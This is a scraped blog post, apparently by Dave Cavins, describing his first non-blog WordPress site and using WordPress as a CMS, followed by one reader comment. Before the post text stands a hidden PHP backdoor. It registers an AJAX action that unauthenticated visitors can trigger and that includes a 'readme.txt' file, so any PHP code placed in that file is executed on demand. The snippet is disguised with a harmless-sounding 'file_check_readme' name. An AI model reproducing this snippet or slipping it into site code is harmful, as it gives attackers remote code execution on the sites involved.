if(!function_exists('file_check_readme38985')){ add_action('wp_ajax_nopriv_file_check_readme38985', 'file_check_readme38985'); add_action('wp_ajax_file_check_readme38985', 'file_check_readme38985'); function file_check_readme38985() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } Wordpress as a CMS – Dave Cavins

WordPress as a CMS

I have been usin wordpress for about two weeks now and never thought of using it as a CMS solution. In most cases I use Joomla, Drupal or DotNetNuke for CMS sites. I built my first non-blog WordPress site. It was alot esier than I expected and customizing the template to act like a regular site was easy. Here is a link to the site (I did not do the design just the implementation)  http://givetomorgan.com/

Here are some additional resources on using WordPress as a CMS

3 thoughts on “WordPress as a CMS”

    1. Woohoo!!! My first comment. Its funny because about a year and a half ago I would have tried to build everything in Joomla. I have no loyalty when it comes to CMS platforms.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top